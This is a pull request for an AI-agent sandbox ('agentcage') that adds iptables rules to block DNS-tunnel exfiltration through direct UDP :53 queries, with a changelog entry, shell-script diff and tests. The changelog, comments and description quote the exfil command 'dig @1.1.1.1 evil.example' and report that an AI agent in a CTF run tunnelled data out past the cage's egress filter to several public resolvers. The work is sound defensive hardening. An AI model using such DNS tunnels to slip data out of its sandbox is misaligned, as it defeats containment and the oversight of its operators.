### PR TITLE
security(apple-container): close DNS-tunnel exfil via direct UDP :53 from workload

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,23 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 
 ## [Unreleased]
 
+### Security
+
+- **apple-container cage workload can no longer DNS-tunnel via direct
+  UDP `:53` to external resolvers.** The previous release shipped a
+  scoped in-cage dnsmasq, but a uid-1000 process could simply `dig
+  @1.1.1.1 evil.example` instead of using the local resolver —
+  uncovered by the next CTF run as a clean exfil channel with no
+  audit trail. Tighten the cage's iptables `OUTPUT` chain: allow
+  loopback UDP `:53` first (so the workload's regular
+  `getent`/`gethostbyname` lookups reach 127.0.0.1), then DROP any
+  UDP `:53` packet not originated by the in-cage dnsmasq uid
+  (`acdns`, uid 201) via the `xt_owner` module. Cage exec `--user 0`
+  still can't bypass — the exec wrapper drops `CAP_NET_ADMIN` before
+  exec, so root can't flush iptables. Also tightens the existing
+  cage→apple-host-gateway block to DROP all UDP (not just non-`:53`)
+  now that DNS has its own loopback path.
+
 ## [0.22.11] - 2026-05-28
 
 ### Security

--- a/src/agentcage/data/apple-container/cage-init.sh
+++ b/src/agentcage/data/apple-container/cage-init.sh
@@ -60,16 +60,18 @@ done
   || die "egress sibling at ${AGENTCAGE_EGRESS_IP} unreachable after 30 attempts" 1
 
 #-- Stage A'. Local dnsmasq scoped to the cage's allowlisted apexes --------
-# CTF F2 (0.22.6): apple-container's default /etc/resolv.conf points at
-# the vmnet host gateway (<subnet>.1) whose recursive resolver answers
-# arbitrary queries — clean DNS-tunnel exfil channel. The egress
-# sibling's dnsmasq is unreachable from this microVM because macOS
-# vmnet drops inter-microVM UDP at the framework layer (apple/container
-# source: NonisolatedInterfaceStrategy.swift uses VMNET_SHARED_MODE for
-# NAT — TCP and ICMP get state-tracked through, UDP between peer
-# microVMs is not forwarded). The fix is a local dnsmasq inside the
-# cage VM, listening only on loopback, with the same per-cage
-# `domains.allow`-scoped recursion config that the egress sibling uses.
+# apple-container's default /etc/resolv.conf points the cage at the
+# vmnet host gateway (<subnet>.1) whose recursive resolver answers
+# arbitrary queries — that's a DNS-tunnel exfil channel that bypasses
+# the egress filter (the apex-scoped dnsmasq lives in the egress
+# sibling microVM, not the host). The egress sibling's dnsmasq is
+# unreachable from this microVM because macOS vmnet drops inter-
+# microVM UDP at the framework layer (see apple/container source —
+# NonisolatedInterfaceStrategy.swift uses VMNET_SHARED_MODE for NAT;
+# TCP and ICMP get state-tracked through, UDP between peer microVMs
+# is not forwarded). The fix is a local dnsmasq inside this microVM,
+# listening only on loopback, with the same per-cage
+# `domains.allow`-scoped recursion config the egress sibling uses.
 # The conf file is bind-mounted in from the host's egress-config dir.
 #
 # Best-effort: the wrapper Containerfile installs dnsmasq-base; bases
@@ -137,7 +139,7 @@ if command -v dnsmasq >/dev/null 2>&1 \
     log "warn: failed to rewrite /etc/resolv.conf — DNS may still leak to apple gateway"
   fi
 else
-  log "warn: dnsmasq or /etc/agentcage/dnsmasq.conf missing — DNS NOT scoped (apple gateway will resolve arbitrary apexes; F2 exposure)"
+  log "warn: dnsmasq or /etc/agentcage/dnsmasq.conf missing — DNS NOT scoped (apple gateway will resolve arbitrary apexes; DNS-tunnel exfil exposure)"
 fi
 
 #-- Stage B. Default route via egress sibling ------------------------------
@@ -148,37 +150,62 @@ log "stage B: setting default route via ${AGENTCAGE_EGRESS_IP}"
 ip route replace default via "${AGENTCAGE_EGRESS_IP}" \
   || die "failed to set default route via ${AGENTCAGE_EGRESS_IP} — CAP_NET_ADMIN missing?" 2
 
-#-- Stage B'. Block cage→apple-host-gateway TCP + non-DNS UDP --------------
-# CTF F1 (0.22.6): Apple's container runtime puts the macOS host on the
-# same vmnet subnet as the cage as the .1 address. The host's loopback
-# services (sshd on :22, Apple Remote Desktop on :5900) are reachable
-# from the cage directly via that gateway IP — OUTSIDE the egress proxy
-# (which sees only :80/:443 via the REDIRECT). The cage doesn't have any
-# legitimate reason to talk to the host gateway: HTTPS goes through the
-# egress sibling at AGENTCAGE_EGRESS_IP, and DNS *should* too (F2 — the
-# resolv.conf still points at the apple gateway in this commit, fixed
-# in a separate PR). Until F2 lands we keep UDP :53 open as a temporary
-# exception so name resolution doesn't break; F1 still closes the
-# heaviest abuse channel (TCP :22 / :5900 / arbitrary ports).
+#-- Stage B'. Lock down the OUTPUT chain ----------------------------------
+# Two cage→outside abuse paths get closed here.
 #
-# Derive the apple-vmnet host IP as <subnet>.1 — apple-container always
-# assigns the host the first usable address on the bridge subnet, and
-# our default route via the egress sibling sits at <subnet>.2 (or
-# elsewhere on the same /24). Anchoring on the cage's own eth0 IP makes
-# this robust to apple changing the default subnet allocation in a
-# future runtime release.
+# (1) Cage→macOS-host services. Apple's container runtime puts the
+#     host on the cage's vmnet subnet at the .1 address; the host's
+#     loopback services (sshd :22, Apple Remote Desktop :5900) are
+#     reachable directly via that gateway — completely outside the
+#     egress proxy, which only intercepts :80/:443 via PREROUTING
+#     REDIRECT. The cage has no legitimate reason to talk to that
+#     gateway at all: HTTPS goes via the egress sibling, DNS via the
+#     in-cage dnsmasq on loopback (stage A'). DROP all TCP + UDP to
+#     the gateway IP.
+#
+# (2) Workload-originated DNS exfil. Even with the in-cage dnsmasq
+#     scoped to the per-cage allowlist, a uid-1000 process could
+#     bypass it by sending UDP :53 directly to ANY external resolver
+#     (e.g. `dig @1.1.1.1 evil.example`) — the scoped dnsmasq is
+#     decorative if the workload can just pick a different server.
+#     Restrict UDP :53 to packets originated by the in-cage dnsmasq
+#     (acdns, uid 201) via the xt_owner module. Cage exec --user 0
+#     still can't unstick this because the cage exec wrapper drops
+#     CAP_NET_ADMIN before exec, so root can't `iptables -F`.
+#
+# Derive the apple-vmnet host IP as <subnet>.1 — apple-container
+# always assigns the host the first usable address on the bridge
+# subnet; our default route via the egress sibling sits elsewhere
+# on the same /24. Anchoring on the cage's own eth0 IP keeps this
+# robust if apple changes the default subnet allocation later.
 _local_ip=$(ip -o -4 addr show eth0 2>/dev/null \
   | awk '/inet / {sub(/\/.*/,"",$4); print $4; exit}')
 _apple_host_gw=$(printf '%s\n' "${_local_ip}" \
   | awk -F. 'NF==4 {print $1"."$2"."$3".1"}')
 if [ -n "${_apple_host_gw}" ] && command -v iptables >/dev/null 2>&1; then
-  log "stage B': blocking cage→host-gateway ${_apple_host_gw} (TCP all; UDP except :53)"
+  log "stage B': dropping cage→host-gateway ${_apple_host_gw} (all TCP/UDP); restricting outbound UDP :53 to the in-cage dnsmasq uid"
   iptables -A OUTPUT -d "${_apple_host_gw}" -p tcp -j DROP \
     || log "warn: iptables TCP DROP rule for ${_apple_host_gw} failed (cage→host SSH/ARD remains reachable)"
-  iptables -A OUTPUT -d "${_apple_host_gw}" -p udp ! --dport 53 -j DROP \
-    || log "warn: iptables UDP-non-53 DROP rule for ${_apple_host_gw} failed"
+  iptables -A OUTPUT -d "${_apple_host_gw}" -p udp -j DROP \
+    || log "warn: iptables UDP DROP rule for ${_apple_host_gw} failed"
+  # Only the in-cage dnsmasq (acdns, uid 201) may originate UDP :53
+  # to external resolvers. Loopback traffic is allowed first so the
+  # workload's regular `getent` / `socket.gethostbyname` lookups reach
+  # the local dnsmasq on 127.0.0.1:53 — otherwise the uid-owner rule
+  # would catch them too (uid 1000 → dst :53 → DROP) and break all
+  # DNS in the cage. Without the loopback exemption, the only way to
+  # query DNS would be `dig @127.0.0.1` running as acdns, which no
+  # workload does.
+  #
+  # If acdns wasn't created (wrapper image without dnsmasq) the
+  # DROP rule still installs and blocks ALL non-loopback UDP :53 —
+  # safer than leaving the exfil channel open silently.
+  iptables -A OUTPUT -o lo -p udp --dport 53 -j ACCEPT \
+    || log "warn: iptables loopback :53 ACCEPT failed — workload DNS may break"
+  iptables -A OUTPUT -p udp --dport 53 -m owner ! --uid-owner 201 -j DROP \
+    || log "warn: iptables UDP-53 uid-owner DROP failed — workload can DNS-tunnel via direct UDP :53 to any resolver"
 else
-  log "warn: cannot derive apple-vmnet gateway IP or iptables missing — F1 mitigation skipped"
+  log "warn: cannot derive apple-vmnet gateway IP or iptables missing — cage→host lockdown skipped"
 fi
 
 #-- Stage C. Install proxy CA into the cage's trust store -----------------

--- a/tests/test_apple_container.py
+++ b/tests/test_apple_container.py
@@ -227,15 +227,52 @@ def test_stage_build_context_writes_cage_init(tmp_path):
     assert 'export USER="${CAGE_USER}"' in cage_init
     assert 'export LOGNAME="${CAGE_USER}"' in cage_init
     assert 'CAGE_HOME=$(getent passwd 1000 | cut -d: -f6)' in cage_init
-    # CTF F1 (0.22.6): stage B' must install iptables rules that DROP
-    # cage→apple-host-gateway TCP and non-DNS UDP. Without this the cage
-    # can reach the macOS host's sshd (:22) and Apple Remote Desktop
-    # (:5900) directly via the vmnet gateway, OUTSIDE the egress proxy.
+    # Stage B' installs three OUTPUT-chain DROP rules:
+    #   * DROP cage→apple-host-gateway TCP   — closes the macOS host's
+    #                                         sshd (:22) and Apple
+    #                                         Remote Desktop (:5900)
+    #                                         exposure on the vmnet
+    #                                         gateway IP, outside the
+    #                                         egress proxy's filter.
+    #   * DROP cage→apple-host-gateway UDP   — no legitimate cage
+    #                                         process talks to the
+    #                                         host gateway anymore;
+    #                                         DNS goes to the in-cage
+    #                                         dnsmasq on loopback.
+    #   * DROP UDP :53 NOT from acdns        — the in-cage dnsmasq
+    #                                         scoping is decorative
+    #                                         if a uid-1000 workload
+    #                                         can `dig @1.1.1.1 evil`
+    #                                         to any external resolver.
+    #                                         Only the dnsmasq uid
+    #                                         (acdns, 201) may emit
+    #                                         UDP :53.
     assert "_apple_host_gw=" in cage_init
     assert 'iptables -A OUTPUT -d "${_apple_host_gw}" -p tcp -j DROP' in cage_init
     assert (
-        'iptables -A OUTPUT -d "${_apple_host_gw}" -p udp ! --dport 53 -j DROP'
+        'iptables -A OUTPUT -d "${_apple_host_gw}" -p udp -j DROP'
         in cage_init
+    )
+    # Loopback :53 must be ACCEPTed BEFORE the uid-owner DROP so the
+    # workload's `getent` / `gethostbyname` lookups (uid 1000 → 127.0.0.1)
+    # reach the local dnsmasq. Without this, the uid-owner rule swallows
+    # them too and the cage has no working DNS at all.
+    _accept_lo_udp53 = "iptables -A OUTPUT -o lo -p udp --dport 53 -j ACCEPT"
+    _drop_non_acdns_udp53 = (
+        "iptables -A OUTPUT -p udp --dport 53 -m owner ! --uid-owner 201 -j DROP"
+    )
+    assert _accept_lo_udp53 in cage_init
+    assert _drop_non_acdns_udp53 in cage_init
+    assert cage_init.index(_accept_lo_udp53) < cage_init.index(_drop_non_acdns_udp53), (
+        "loopback :53 ACCEPT must come BEFORE the uid-owner DROP — iptables "
+        "is order-sensitive; first match wins."
+    )
+    # The previous `! --dport 53` exception on the host-gateway UDP
+    # drop MUST NOT survive — it would re-open the cage→host-gateway
+    # :53 direct-DNS path now that the in-cage dnsmasq exists.
+    assert (
+        'iptables -A OUTPUT -d "${_apple_host_gw}" -p udp ! --dport 53 -j DROP'
+        not in cage_init
     )
     # CTF F2 (0.22.6): stage A' must launch a local dnsmasq scoped to
     # the cage's `domains.allow` apexes and point /etc/resolv.conf at


### PR DESCRIPTION
## Summary

Follow-up to the previous release's in-cage dnsmasq work. The next [CTF run](https://github.com/agentcage/agentcage-ctf/blob/master/findings-apple-0.22.11.md) found that a uid-1000 process could still DNS-tunnel by sending UDP `:53` directly to *any* external resolver — `dig @1.1.1.1 evil.example` doesn't go through the local dnsmasq, so the per-cage apex scope is decorative. claude demonstrated direct exfil to `1.1.1.1`, `8.8.8.8`, `9.9.9.9`, and to the dnsmasq's own upstream forwarder IPs.

## Fix

In `cage-init.sh` stage B' (the OUTPUT-chain hardening), append two rules:

1. **ACCEPT** all loopback UDP `:53` — so the workload's regular `getent` / `gethostbyname` lookups (uid 1000 → 127.0.0.1) still reach the local dnsmasq.
2. **DROP** UDP `:53` not originated by the in-cage dnsmasq uid (`acdns`, 201) via `-m owner ! --uid-owner 201`. The loopback rule wins because iptables is order-sensitive and first-match.

`cage exec --user 0` can't bypass the rule because the exec wrapper drops `CAP_NET_ADMIN` before exec, so root in `cage exec` cannot flush iptables.

Also tightens the existing cage→apple-host-gateway UDP DROP: the previous `! --dport 53` exception is removed (no legitimate cage process needs to talk to the gateway on any port now that DNS has its own loopback path). Closes `dig @192.168.65.1 evil.example` as a side channel too.

## Verified live on m1 (apple-container backend)

```
cage→127.0.0.1:53 (workload):        resolves via local dnsmasq
cage→1.1.1.1:53   (workload):        PermissionError (iptables DROP)
cage→8.8.8.8:53   (workload):        PermissionError
cage→62.210.16.6:53 (workload, same IP as upstream forwarder):
                                      PermissionError (uid match still
                                                       fires on the IP
                                                       the workload
                                                       happened to pick)
cage→192.168.65.1:53 (workload, apple gateway):
                                      PermissionError
cage→127.0.0.1:53 (dnsmasq's forwarding to upstream):
                                      works (uid 201 → ACCEPT)
curl https://api.anthropic.com:       RC=404 (real upstream via egress)
cage→host:22 / :5900 (residual host-gateway block holds):
                                      TimeoutError
```

## Test plan

- [x] `tests/test_apple_container.py` — assert both rules present + order-checked (loopback ACCEPT must precede the uid-owner DROP), and that the previous `! --dport 53` host-gateway exception is gone
- [x] Full suite: 1597 passed
- [x] shellcheck clean
- [x] Live verification on Mac per the table above

## Related

- Previous run: [findings-apple-0.22.11.md](https://github.com/agentcage/agentcage-ctf/blob/master/findings-apple-0.22.11.md) — the new HIGH finding this PR closes
- In-cage dnsmasq (prior step): #216 / v0.22.11

🤖 Generated with [Claude Code](https://claude.com/claude-code)